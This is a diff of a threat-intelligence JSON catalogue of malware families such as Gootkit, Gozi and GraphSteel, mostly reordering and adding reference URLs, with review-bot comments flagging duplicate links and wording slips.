- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/",
- "https://www.ic3.gov/media/news/2020/200728.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/",
 "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.ic3.gov/media/news/2020/200728.pdf",
+ "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/",
- "https://www.ic3.gov/Media/News/2020/201103-1.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/"
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/",
+ "https://www.ic3.gov/Media/News/2020/201103-1.pdf"
 ],
 "synonyms": [],
 "type": []
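Review bot: The new GoldenSpy description opens with `According securityweek, GoldenSpy, the malware was observed`, which drops the preposition and repeats the subject; `According to SecurityWeek, GoldenSpy was observed as part of a campaign ...` reads correctly. The GoldDragon description in a later hunk keeps the same kind of slip (`campaing`, plus a trailing space before the closing quote) while only its curly apostrophe was re-escaped. These strings appear to be imported from the upstream Malpedia record, so the wording fix presumably belongs upstream, with this file regenerated afterwards rather than hand-edited.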
@@ -26353,16 +27559,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a",
 "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
 "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
 "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/",
- "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
- "https://securelist.com/extracting-type-information-from-go-binaries/104715/",
 "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/",
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/"
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/",
+ "https://securelist.com/extracting-type-information-from-go-binaries/104715/",
+ "https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a"
 ],
 "synonyms": [
 "SUNSHUTTLE"
@@ -26373,15 +27579,15 @@ "value": "GoldMax" }, { - "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim’s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ", + "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim\u2019s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. 
", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", - "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", "https://www.youtube.com/watch?v=rfzmHjZX70s", "https://asec.ahnlab.com/en/31089/", - "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf" + "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html" ], "synonyms": [ "Lovexxx" @@ -26396,6 +27602,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", + "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign", "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" ], "synonyms": [], @@ -26422,8 +27629,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer", - "https://twitter.com/vxunderground/status/1469713783308357633", - "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April" + "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April", + "https://twitter.com/vxunderground/status/1469713783308357633" ], "synonyms": [], "type": [] 
@@ -26437,8 +27644,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor",
 "https://norfolkinfosec.com/a-new-look-at-old-dragonfly-malware-goodor/",
- "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
+ "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
 ],
 "synonyms": [
 "Fuerboos"
@@ -26479,43 +27686,43 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md", - "https://securelist.com/gootkit-the-cautious-trojan/102731/", - "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", - "https://www.certego.net/en/news/malware-tales-gootkit/", - "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", - "https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/PUBLIC_Gootloader%20-%20Foreign%20Intelligence%20Service.pdf", - "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", - "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/", - "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/", - "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope", - "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", - "https://twitter.com/MsftSecIntel/status/1366542130731094021", - "https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html", - "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", "https://www.youtube.com/watch?v=QgUlPvEE4aw", - "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", "https://www.youtube.com/watch?v=242Tn0IL2jE", + 
"https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", + "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055", + "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", + "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection", "https://dannyquist.github.io/gootkit-reversing-ghidra/", - "https://news.drweb.com/show/?i=4338&lng=en", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", - "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055", - "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", - "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", - "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", - "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", - "https://twitter.com/jhencinski/status/1464268732096815105", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/", + "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", + "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html", + "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", + 
"https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", + "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md", + "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/", + "https://news.drweb.com/show/?i=4338&lng=en", + "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728", + "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", "https://www.us-cert.gov/ncas/alerts/TA16-336A", + "https://www.certego.net/en/news/malware-tales-gootkit/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", + "https://securelist.com/gootkit-the-cautious-trojan/102731/", + "https://twitter.com/jhencinski/status/1464268732096815105", + "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728" + "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", + "https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/PUBLIC_Gootloader%20-%20Foreign%20Intelligence%20Service.pdf", + "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html", + 
"https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://twitter.com/MsftSecIntel/status/1366542130731094021", + "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/" ], "synonyms": [ "Waldek", @@ -26532,8 +27739,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe", - "https://github.com/strictlymike/presentations/tree/master/2020/2020.02.08_BSidesHuntsville", - "https://www.proofpoint.com/us/threat-insight/post/dyre-malware-campaigners-innovate-distribution-techniques" + "https://www.proofpoint.com/us/threat-insight/post/dyre-malware-campaigners-innovate-distribution-techniques", + "https://github.com/strictlymike/presentations/tree/master/2020/2020.02.08_BSidesHuntsville" ], "synonyms": [], "type": [] 
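Review bot: After the reorder the Gootkit `refs` array still carries the same SentinelOne deep-dive under two hosts — the retained context entry `"https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/"` and the re-added `"https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/"` — so consumers that enrich or auto-fetch references will process the same article twice. One of the two lines should be dropped, keeping whichever host currently resolves. Since this cluster looks machine-generated from Malpedia, the dedup is better placed in the generator (normalising host aliases and trailing slashes) than patched by hand here; the hunk itself starts on an earlier line of this page.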
@@ -26586,25 +27793,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", + "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef", + "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://www.youtube.com/watch?v=BcFbkjUVc7o", + "https://lokalhost.pl/gozi_tree.txt", + "https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072", + "https://0xtoxin.github.io/threat%20breakdown/Gozi-Italy-Campaign/", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "https://github.com/mlodic/ursnif_beacon_decryptor", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/", - "https://www.secureworks.com/research/gozi", - "https://lokalhost.pl/gozi_tree.txt", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance", - "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef", 
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.youtube.com/watch?v=BcFbkjUVc7o", - "https://github.com/mlodic/ursnif_beacon_decryptor", - "https://www.secureworks.com/research/threat-profiles/gold-swathmore", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/", - "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", - "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.secureworks.com/research/gozi", + "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance" ], "synonyms": [ "CRM", @@ -26623,9 +27832,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", - "https://de.securelist.com/analysis/59479/erpresser/", - "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", + "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", + "https://de.securelist.com/analysis/59479/erpresser/", "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/" ], "synonyms": [], 
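Review bot: The new side of the Gozi entry lists the same Microsoft ransomware-as-a-service post twice: the added `"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"` (trailing slash) and the context entry immediately before the removed `youtube.com` line, which is the identical URL without the slash. Only one should survive; the trailing-slash form matches the other entries in this array. If the file is regenerated from Malpedia, the generator should canonicalise URLs (strip trailing slash, lower-case host) before emitting `refs` so these near-duplicates stop reappearing on every refresh.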
@@ -26652,9 +27861,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor",
- "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html"
+ "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html",
+ "https://bin.re/blog/the-dga-of-symmi/"
+ ],
+ "synonyms": [
+ "MewsSpy"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf",
@@ -26665,10 +27877,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gramdoor",
- "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
 "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
 "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf"
+ "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611"
 ],
 "synonyms": [
 "Small Sieve"
@@ -26683,15 +27895,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro",
- "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
- "https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season",
- "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks",
 "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/",
+ "https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals",
 "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.metabaseq.com/grandoreiro-banking-malware-deciphering-the-dga/",
+ "https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_study_grandoreiro_analysis_2022_v1.pdf",
+ "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/",
 "https://blueliv.com/resources/reports/MiniReport-Blueliv-Bancos-ESP-LAT.pdf",
- "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/"
+ "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks",
+ "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -26712,26 +27926,62 @@ "uuid": "626de4fc-cfa4-4fbc-ab35-4c9ab9fdec14", "value": "GrandSteal" }, + { + "description": "PANW Unit 42 describes this malware as capable of up and downloading files as well as loading additional shellcode payloads into selected target processes. It uses the Microsoft Graph API and Dropbox API as C&C channel.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphdrop", + "https://www.avertium.com/resources/threat-reports/evolution-of-russian-apt29-new-attacks-and-techniques-uncovered", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf", + "https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/" + ], + "synonyms": [ + "GraphicalProton" + ], + "type": [] + }, + "uuid": "15d96a22-118b-4933-8258-e9cc4dd9719a", + "value": "GraphDrop" + }, { "description": "This loader abuses the benign service Notion for data exchange.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino", - "https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf", "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58", - "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine" + "https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d", + "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf", + "https://mssplab.github.io/threat-hunting/2023/06/02/malware-analysis-apt29.html", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf" + ], + "synonyms": [ + "SNOWYAMBER" ], - "synonyms": [], "type": [] }, "uuid": "cb92a200-b4f0-4983-8d5d-6bf529b66da9", "value": "GraphicalNeutrino" }, + { + "description": "According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - 
also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican\u2019s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/flea-backdoor-microsoft-graph-apt15" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ccaefb44-1cbb-4f91-bd2d-ea5735446d1d", + "value": "Graphican" + }, { "description": "Downloader / information stealer used by UAC-0056, observed since at least October 2022.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphiron", + "https://www.secureworks.com/research/the-growing-threat-from-infostealers", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer" ], "synonyms": [], 
@@ -26773,16 +28023,18 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel", "https://www.mandiant.com/resources/spear-phish-ukrainian-entities", + "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/", "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://cert.gov.ua/article/38374", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830", + "https://www.secureworks.com/research/the-growing-threat-from-infostealers", + "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/", + "https://cert.gov.ua/article/38374", + "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", "https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine", - "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/" + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel" ], "synonyms": [], "type": [] 
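Review bot: The last added line of the GraphSteel hunk, `"https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel"`, duplicates the first entry of the same `refs` array, which is kept as context at the top of the hunk, so this commit introduces an exact duplicate reference. The added line should be dropped and the trailing comma removed from the preceding `"https://cip.gov.ua/en/news/..."` entry so the array closes on it, as every other `refs` array in the file closes on its Malpedia-less final URL. The same array also keeps the Trustwave overview both with and without a trailing slash; if this cluster is regenerated from Malpedia, a canonicalise-and-dedup step in the generator would fix both at once.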
@@ -26791,20 +28043,20 @@ "value": "GraphSteel" }, { - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. 
Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-franklin", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/", - "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf", - "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", + "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/", + "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", - "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html" + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-franklin" ], "synonyms": [ "FrameworkPOS", 
@@ -26833,10 +28085,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat",
- "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/",
- "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html",
 "https://securelist.com/gravityrat-the-spy-returns/99097/",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/"
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
